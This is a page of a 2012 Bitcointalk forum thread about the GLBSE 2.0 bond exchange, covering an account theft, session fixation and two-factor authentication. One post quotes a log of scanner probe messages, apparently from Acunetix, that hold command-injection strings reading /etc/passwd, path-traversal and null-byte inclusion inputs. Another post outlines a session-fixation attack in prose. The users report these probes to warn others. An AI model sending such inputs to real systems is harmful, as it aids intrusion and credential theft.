Pages:
Author

Topic: GLBSE 2.0 open for testing - page 3. (Read 51751 times)

sr. member
Activity: 476
Merit: 250
Keep it Simple. Every Bit Matters.
September 14, 2012, 04:55:01 AM
Nefario, I did a quick search, but couldn't find this being suggested before, at least since you introduced the idea of the different markets, pink, blue and white (good idea btw). Gathered this should be a value of trust in these bonds.

Can we add another to the list that fills the criteria for ones that are rolling down their operation's or in fact dead or inactive?

For example, we have a lot bonds, that are directly linked to pirate investments (PPT). Contracts are broken, dividends aren't being paid out, buy backs can't or aren't occurring. It's an asset which shouldn't be traded by anyone and that should be made quiet clear with a separate group for them.
hero member
Activity: 602
Merit: 513
GLBSE Support [email protected]
September 04, 2012, 03:20:20 PM
He was visiting his wife's family in China. I'm not sure when he's going back home. I believe within the next 2 weeks.

I'm in London now, I've had a look at the attempted "hack", quite funny if it wasn't annoying to users. I hadn't considered putting limits on the number of PM's some can send.

I'll also clean up the spam.
hero member
Activity: 745
Merit: 501
September 01, 2012, 04:35:19 PM
He was visiting his wife's family in China. I'm not sure when he's going back home. I believe within the next 2 weeks.
legendary
Activity: 1162
Merit: 1000
DiabloMiner author
September 01, 2012, 03:16:28 PM
Nefario seems to be very busy in real life and is out of his country, so he might not be heard from for a few days.
sr. member
Activity: 389
Merit: 250
August 31, 2012, 11:11:32 PM
I would be very disappointed if that crap worked on GLBSE, I'm glad to see no one posted anything but annoyance at the spam. (Also, maybe there's a use for a "Report spam" Button?)

There are definitely things that can be done to improve security, but as with any patch Nefario has to be careful to make sure any patch he applies doesn't introduce a security vulnerability, even if it's a security patch. During/after that he has to make sure that the site remains functional; a patch that helps keep other people from hijacking your session may make it harder for you to use your session, which would certainly annoy a great many users.

I'm sure he's hard at work on something, though I can't say for sure what (It may still be features other than security enhancements, there are plenty of people yelling for those too)
legendary
Activity: 1162
Merit: 1000
DiabloMiner author
August 31, 2012, 10:07:48 PM
hero member
Activity: 745
Merit: 501
August 31, 2012, 06:43:59 PM
Looks like someone is trying to hack GLBSE by using the mailing form =/

Don't think it will work tho.
legendary
Activity: 1199
Merit: 1012
August 31, 2012, 05:32:29 PM
i received strange letters at glbse mailbox:

asdzxc   arsenische    18:28 Fri-31/Aug   1
asdzxc   arsenische    18:28 Fri-31/Aug   1
asdzxc   arsenische    18:28 Fri-31/Aug   1
asdzxc   arsenische    18:25 Fri-31/Aug    SomeCustomInjectedHeader:injected_by_wvs
asdzxc   arsenische    18:25 Fri-31/Aug    SomeCustomInjectedHeader:injected_by_wvs
asdzxc   arsenische    18:25 Fri-31/Aug    SomeCustomInjectedHeader:injected_by_wvs
asdzxc   arsenische    18:24 Fri-31/Aug   '"()
asdzxc   arsenische    18:24 Fri-31/Aug   {"$acunetix"=>"1"}
asdzxc   arsenische    18:24 Fri-31/Aug   1
asdzxc   arsenische    18:24 Fri-31/Aug   1
asdzxc   arsenische    18:24 Fri-31/Aug   1
asdzxc   arsenische    18:23 Fri-31/Aug   http://testasp.vulnweb.com/t/fit.txt?%00.jpg
asdzxc   arsenische    18:23 Fri-31/Aug   1some_inexistent_file_with_long_name%00.jpg
asdzxc   arsenische    18:23 Fri-31/Aug   http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
asdzxc   arsenische    18:21 Fri-31/Aug   1
asdzxc   arsenische    18:21 Fri-31/Aug   1
asdzxc   arsenische    18:21 Fri-31/Aug   ${100036+99616}
asdzxc   arsenische    18:21 Fri-31/Aug   1
asdzxc   arsenische    18:21 Fri-31/Aug   1
...
asdzxc   arsenische    19:03 Fri-31/Aug   "|dir
asdzxc   arsenische    19:03 Fri-31/Aug   '&dir&'
asdzxc   arsenische    19:03 Fri-31/Aug   '|dir
asdzxc   arsenische    19:03 Fri-31/Aug   |dir
asdzxc   arsenische    19:03 Fri-31/Aug   "&dir&"
asdzxc   arsenische    19:03 Fri-31/Aug   ";cat /etc/passwd;"
asdzxc   arsenische    19:03 Fri-31/Aug   &dir
asdzxc   arsenische    19:03 Fri-31/Aug   ||cat /etc/passwd
asdzxc   arsenische    19:03 Fri-31/Aug   ';cat /etc/passwd;'
asdzxc   arsenische    19:03 Fri-31/Aug   |cat /etc/passwd#
asdzxc   arsenische    19:03 Fri-31/Aug   "|"ld
asdzxc   arsenische    19:03 Fri-31/Aug   '|'ld
asdzxc   arsenische    19:03 Fri-31/Aug   `cat /etc/passwd`
asdzxc   arsenische    19:03 Fri-31/Aug   ;cat /etc/passwd;
asdzxc   arsenische    19:03 Fri-31/Aug    cat /etc/passwd
asdzxc   arsenische    19:03 Fri-31/Aug   &cat /etc/passwd&
asdzxc   arsenische    19:03 Fri-31/Aug   '&cat /etc/passwd&'
asdzxc   arsenische    19:03 Fri-31/Aug   "&cat /etc/passwd&"
asdzxc   arsenische    19:02 Fri-31/Aug   /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
asdzxc   arsenische    19:02 Fri-31/Aug   ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini


-- is everything ok?
donator
Activity: 980
Merit: 1000
August 30, 2012, 05:31:07 PM
Are graphs not working?
hero member
Activity: 745
Merit: 501
August 30, 2012, 04:10:15 PM
2 factor auth is not required simply because it requires an external device (smartphone) to be efficient and not everyone has a smartphone. I decided to get one specifically to protect my GLBSE assets.
This is false.  JAuth and other OSS software are available for OSX, Win and Linux to use the Google 2FA framework.

There is no device based excuse not to use 2FA.


The problem here is that there is no notification about *how to use* 2FA, including any links to needed software, on GLBSE.


This gives the wrong impression just like both you and I had about 2FA.  I didn't turn on 2FA on GLBSE because I don't have a smart phone.


Terms of Service doesn't mean someone isn't negligent.  It's just that they might not be legally responsible for being negligent.

True, you can use it on a computer too, but it SHOULD be an external computer, not the computer you use to login. Which also requires an external device such as an extrea computer, or smartphone. Otherwise someone with a compromised computer can still get your account stolen easily. The 2 factor auth needs to be on another device to effectively block infected/keylogged computers from stealing an account. There's no instructions as to how to use it, but there ARE links to the Google Authentificator app along with the name written in big at the top of the page. You can simply click one of those links or go read about it. There's more than enough instructions on Google's website about it.

And yes, I'm not saying it couldn't be negligence. I'm saying that people started using a service which was NOT finished and Nefario still doesn't claim it to be a finished product, although he's been working quickly since 1.0 when he noticed someone had created an asset for real use. The product never got out of Beta however. However it does seem secure so far.

If you weren't doing anything else than using GLBSE and IRC, and never clicked any link in IRC, my best guess would be that someone had your login info or a compromised account.

If it was a session hijack, then GLBSE's security could be improved to deter this.

The easiest attack would probably be if GLBSE accepts the session ID to be set externally and you click a shortened url which brings to a page with a redirect script. The redirect brings to an actual legit page. The page containing the redirect first records an ID and open in a frame GLBSE setting the session ID to said ID. Everyone that clicked on the link sees a legit page loading but has now a new session identifier set for GLBSE. The attacker now can try accessing GLBSE with each generated ID and if associated with someone already logged in GLBSE, he can get access to the account. Although I'd be very surprised that GLBSE accepts the session ID to be set/changed through a link, it would be a major security risk. Many things could be done to prevent session based attacks if not already done.

Does anybody have a quick link to info on the 2FA?


http://support.google.com/a/bin/answer.py?hl=en&answer=1037451
hero member
Activity: 518
Merit: 500
August 30, 2012, 03:50:04 PM

2 factor auth is not required simply because it requires an external device (smartphone) to be efficient and not everyone has a smartphone. I decided to get one specifically to protect my GLBSE assets.



This is false.  JAuth and other OSS software are available for OSX, Win and Linux to use the Google 2FA framework.

There is no device based excuse not to use 2FA.


The problem here is that there is no notification about *how to use* 2FA, including any links to needed software, on GLBSE.


This gives the wrong impression just like both you and I had about 2FA.  I didn't turn on 2FA on GLBSE because I don't have a smart phone.


Terms of Service doesn't mean someone isn't negligent.  It's just that they might not be legally responsible for being negligent.

Does anybody have a quick link to info on the 2FA?
sr. member
Activity: 252
Merit: 250
Inactive
August 30, 2012, 03:44:11 PM

2 factor auth is not required simply because it requires an external device (smartphone) to be efficient and not everyone has a smartphone. I decided to get one specifically to protect my GLBSE assets.



This is false.  JAuth and other OSS software are available for OSX, Win and Linux to use the Google 2FA framework.

There is no device based excuse not to use 2FA.


The problem here is that there is no notification about *how to use* 2FA, including any links to needed software, on GLBSE.


This gives the wrong impression just like both you and I had about 2FA.  I didn't turn on 2FA on GLBSE because I don't have a smart phone.


Terms of Service doesn't mean someone isn't negligent.  It's just that they might not be legally responsible for being negligent.
hero member
Activity: 745
Merit: 501
August 30, 2012, 03:39:03 PM
sr. member
Activity: 392
Merit: 250
August 30, 2012, 03:16:45 PM
I've been thinking it would be a great security feature if you put a 24 hour delay on the creation of assets. That or something similar to protect assets if there is a hacked account.
sr. member
Activity: 252
Merit: 250
Inactive
August 30, 2012, 02:27:20 PM
you have always done right by me, Nefario. I will continue to show support of the GLBSE platform by continued use of it.

Regards,
Andrew

+1. We regard you, Nefario, with great respect. Thanks for all your hard work; the community really appreciates what you do. It's a shame that people like piotr_n try to insult and flame everyone who they disagree with the slightest bit.
Hey - there was a theft on the service and Nefario has refused to provide any information about the thief - he basically did nothing!
He didn't even give the name of the account that "bought" the 2443 of ASICMINER assets at 0.00021 BTC!
Not to mention reverting the transaction - c'mon, how hard would that be?
Considering the above, every sane person would assume that he was actually involved in the theft.

But since the topic says "GLBSE 2.0 open for testing", to prevent my post from being deleted again because of an alleged and ever valid reason of "off-topic", I will suggest at the end that maybe it was a bug that Nefario should investigate? Smiley



Ok.

I am the victim of the ASICMINER theft.  My nature is not to sling sh*t around - particularly when a hacker gets in and no one can definitively point out the method used for the hack.

Also, GLBSE is a great enabler of Bitcoin denominated economic activity.  Props to Nefario for that.

I am only responding on this topic because I see that someone feels just like I do.  Someone takes a loss of thousands of dollars and no one cares to do anything about it if it would only cost ~30 BTC to revert.

With that said I'm super pissed.  Yes, I'm super pissed at GLBSE.  I am also pissed at myself for not doing the right thing and taking pro-active measures to prevent account compromise by enabling 2FA for both login, transfers and withdrawals.  You are not protected from session attacks if you don't enable 2FA for every single GLBSE activity.  Do it.

Since the compromise of my GLBSE account I have set up all sort of IP logging activity just to review and verify that I'm not on a Botnet or compromised by a trojan of any sort.  
My system is quiet.  Nothing unusual.  

3000 shares of ASICMINER asset were transferred to me on 8/23.  An hour later I logged in to web freenode #bitcoin-otc.  I cannot say for certain whether I manually killed my GLBSE session.  I do know that no browser window was open to GLBSE.  I remained logged in to #bitcoin-otc for a few hours.  Later in the evening people were posting of a dump of ASICMINER asset.  I logged in to GLBSE account to find the asset liquidated for ~ %1 of it's value.  

Absolutely nothing occurred on that day out of the ordinary other than visiting freenode.  I have relatively few apps on the system and less running at any one time.  I am not a security expert, but I take precautions and I've never been infected in any obvious way or by report of antivirus or by any insane amount of TCP activity.

So, what I had suspected and with Nefario also pointing out the same possibility is that I was a victim of Session Fixation.  Someone hijacked my GLBSE session.

Nefario's position on this is that attacks of this nature, Session Fixation, are not the responsibility of GLBSE, but admitting at the same time that additional security precautions could be taken on the GLBSE web application side that could make it more difficult to accomplish session related attacks.

At this point I did two things.  Looked up Web security whitepapers.  Found one stating "Session Fixation, ultimately, can only effectively be countered by the Web application (which would include the client side scripting) in how it controls session generation and invalidation."  Ok, fine.  At this point I'm thinking if I close my browser window what happens to my GLBSE session.  If my session was hijacked that would have been the obvious way to get in.  Opened up my Chrome console and looked at the session ID's.  Session ID's persisted across browser windows with a 48 hour browser side expiration period.  Of course, there could be a shorter session expiration period on the web app side.

Edit:
A few thoughts occurred to me.

Why isn't Javascript used to invalidate sessions when the DOM for the page destroyed?
Why aren't sessions invalidated on a client side timer?  Such as most banking sites?
Why isn't 2FA a requirement for every single GLBSE activity?

I think you can see the premise of my questions.  I do believe GLBSE is partially responsible for my loss.

I'm angry because it's entirely too easy to commit fraud and get away with it in a system of Bitcoin and GLBSE that allows or enforces anonymity and instantaneous transfers.  
The feeling I got from the incident is one of "use at your own risk."  





sr. member
Activity: 462
Merit: 250
August 30, 2012, 01:18:33 PM
That's the spirit!

...
I will suggest at the end that maybe it was a bug that Nefario should investigate? Smiley


bugs should be investigated Wink
legendary
Activity: 2053
Merit: 1356
aka tonikt
August 30, 2012, 01:12:08 PM
you have always done right by me, Nefario. I will continue to show support of the GLBSE platform by continued use of it.

Regards,
Andrew

+1. We regard you, Nefario, with great respect. Thanks for all your hard work; the community really appreciates what you do. It's a shame that people like piotr_n try to insult and flame everyone who they disagree with the slightest bit.
Hey - there was a theft on the service and Nefario has refused to provide any information about the thief - he basically did nothing!
He didn't even give the name of the account that "bought" the 2443 of ASICMINER assets at 0.00021 BTC!
Not to mention reverting the transaction - c'mon, how hard would that be?
Considering the above, every sane person would assume that he was actually involved in the theft.

But since the topic says "GLBSE 2.0 open for testing", to prevent my post from being deleted again because of an alleged and ever valid reason of "off-topic", I will suggest at the end that maybe it was a bug that Nefario should investigate? Smiley
sr. member
Activity: 294
Merit: 250
Bitcoin today is what the internet was in 1998.
August 30, 2012, 01:06:39 PM
you have always done right by me, Nefario. I will continue to show support of the GLBSE platform by continued use of it.

Regards,
Andrew

+1. We regard you, Nefario, with great respect. Thanks for all your hard work; the community really appreciates what you do. It's a shame that people like piotr_n try to insult and flame everyone who they disagree with the slightest bit.
sr. member
Activity: 266
Merit: 250
The king and the pawn go in the same box @ endgame
August 30, 2012, 07:59:43 AM
you have always done right by me, Nefario. I will continue to show support of the GLBSE platform by continued use of it.

Regards,
Andrew
hero member
Activity: 602
Merit: 513
GLBSE Support [email protected]
August 30, 2012, 07:54:02 AM
Hearing this from you Nefario amuses me to no end, you're normally extremely well-spoken.

Sorry, I'm just getting really tired of people attacking me or GLBSE, they don't have anything to actually criticize so they make stuff up and throw all kinds of baseless accusations.

There is piotr_n as you see but also MPOE-PR (Mircea Popescu of Romania's sock puppet), who lately has been saying that I'm being sued as part of the Bitcoinica lawsuit (says I'm one of the unnamed Does), the guy is making up all kinds of stuff, and attacking me when I'm on IRC.
Pages:
Jump to: